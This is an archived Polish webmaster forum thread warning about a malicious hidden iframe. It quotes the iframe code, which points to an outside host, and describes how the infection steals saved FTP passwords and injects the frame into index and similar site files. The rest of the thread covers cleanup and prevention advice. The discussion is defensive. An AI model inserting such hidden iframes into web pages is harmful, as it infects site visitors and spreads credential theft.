Skocz do zawartości

Uwaga na złośliwy kod


milkus

Rekomendowane odpowiedzi

Wczoraj wszedłem na stronę z ramką o treści :

<iframe src="https://filmproductionlifemedia.cn:8080/ts/in.cgi?pepsi70" width=125 height=125 style="visibility: hidden"></iframe>

Zainfekowany system zawiesza się, a w tym samym czasie na strony, które mamy wpisane w kliencie FTP, zostaje dopisane iframe, do plików index. O samym problemie pisano już na tym forum.

Jeśli macie avasta to polecam zablokowanie adresu wskazanego w powyższym kodzie iframe (Słona WWW -> Blokowanie URL).

Odnośnik do komentarza
Udostępnij na innych stronach

  • Odpowiedzi 52
  • Dodano
  • Ostatniej odpowiedzi

miałem ten syf na swoich stronach, 2 dni zmarnowałem na czyszczenie...

od tamtej pory zero haseł w programach ftp...

blokowanie tego adresu guzik, da bo za każdym razem zmienia się adres... w sensie, dziś wchodzi sobie bot na ftp dodaje kod i idzie dalej, jutro idzie bot i wstawia inny adres B)

jak to działa? wchodzisz na stronę, nood krzyczy że masz wirola, nastepuje blokada systemu, restart, podczas uruchomienia, wirusek robi dalej swoje, blokuje aktualizację wirusów, blokuje same antywirki, blokuje aktualizację autoimatyczne okienek, wykrada hasełka zapisane w TC do ftp i masz co robić ;)

po infekcji najlepiej porobic logi i dac do sprawdzenia gdzieś gdzie się znają na tym... albo format ;)

poobcinał bym rece osobom wymyślającym takie rzeczy... ale to już inna historia :]

edit:

jak się ma strony na kilku hostingach można ciekawych rzeczy się dowiedzieć, ja na przykład po zmianie hasła do ftp przez 5 dni miałem ataki dzień w dzień... zmieniałem hasła i zgłaszałem sprawę suportowi, co sie okazało, pierwsze hasło wpisane podczas zakładania konta było aktywne nawet po zmianie... oczywiście bug naprawiono ;)

- Reklama -

Podatki we Wrocławiu: biuro podatkowe wrocław

Miejscówa do parkowania przy Okęciu: parking okęcie

Odnośnik do komentarza
Udostępnij na innych stronach

Już w innym temacie podałem linka na vBeta, który wg mnie wyjaśnia dlaczego ostatnio jest takie nasilenie tych iframe'ów.

No ale ciężko jest się przestrzec przed takim czymś- albo trzeba by przeglądarkę w maszynie wirtualnej odpalać, albo zmieniać system(ale to nie każdy chce robić).

Odnośnik do komentarza
Udostępnij na innych stronach

nie wszystkie pliki są infekowane

index (tez tego typu: index-blabla.php)

home

main (tez tego typu: main-blabla.php)

default (tez tego typu: default-blabla.php)

tyle pamięta, ale na bank to nie wszystkie ;)

- Reklama -

Podatki we Wrocławiu: biuro podatkowe wrocław

Miejscówa do parkowania przy Okęciu: parking okęcie

Odnośnik do komentarza
Udostępnij na innych stronach

Może już czas zainstalować Linuksa ;)

Irek, błagam, tylko nie zaczynajmy kolejnego flame'a ;)

Tak więc- niech każdy sobie pracuje na czym tam chce, z jedną uwagą- użytkownicy M$ powinni mieć wszystkie programy aktualne, na czele z samym systemem(a dobrze wiem, że aktualizacje się często albo wyłącza, albo odsuwa w nieskończoność).

Odnośnik do komentarza
Udostępnij na innych stronach

u mnie na XP nie ma tylko sp3 i ie8 :]

nod32

spybot S&D

pc tools firewall (na lapku tego nie mam)

windows defender

się człowiek zabezpiecza a guma i tak peka jak ma peknąć ;)

- Reklama -

Podatki we Wrocławiu: biuro podatkowe wrocław

Miejscówa do parkowania przy Okęciu: parking okęcie

Odnośnik do komentarza
Udostępnij na innych stronach

Irek, błagam, tylko nie zaczynajmy kolejnego flame'a
Bez przesady, nie namawiam nikogo wymiany systemy, ale dodatkowy Linuks do łączenia się z serwerami (ftp) nie byłby złym pomysłem. Nawet gdyby Windowsa coś zaatakowało to hasła są bezpieczne.

Nie znam się na pozycjonowaniu, ja tu tylko zużywam transfer i miejsce w sql.

Roman Kluska ujawnia: nadchodzi INFLACYJNY ARMAGEDON!

 

Odnośnik do komentarza
Udostępnij na innych stronach

Kurde przeleciałem pliki Wordpressa i nie widzę żadnego iframe, ale jak sprawdzam kod strony i gdzieś to jest. Dolepiło mi to g*wno na początku, przed HTML. Nie wiecie gdzie wp keszuje strony. Przeleciałem już wszystkie katalogi i nigdzie nie widzę tego kodu.

Odnośnik do komentarza
Udostępnij na innych stronach

No to zakręcony- mówi się trudno i robi 'Format C:\' ;)

otóż nie ;) poszedłem na inne forum, gdzie sprawdzili mi logi (HJ i CF), poradzili co zrobić i mam na dzien dzisiejszy spokój... ale jakoś nie chce wejść na stronę z tym iframe... ;)

edit:

jako ciekawostka, mogę dodać że swojego XP pro na domowym pc mam juz bez formatu z 4, a może i więcej latek ;)

- Reklama -

Podatki we Wrocławiu: biuro podatkowe wrocław

Miejscówa do parkowania przy Okęciu: parking okęcie

Odnośnik do komentarza
Udostępnij na innych stronach

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.

×
×
  • Dodaj nową pozycję...

Powiadomienie o plikach cookie

Umieściliśmy na Twoim urządzeniu pliki cookie, aby pomóc Ci usprawnić przeglądanie strony. Możesz dostosować ustawienia plików cookie, w przeciwnym wypadku zakładamy, że wyrażasz na to zgodę. Warunki użytkowania Polityka prywatności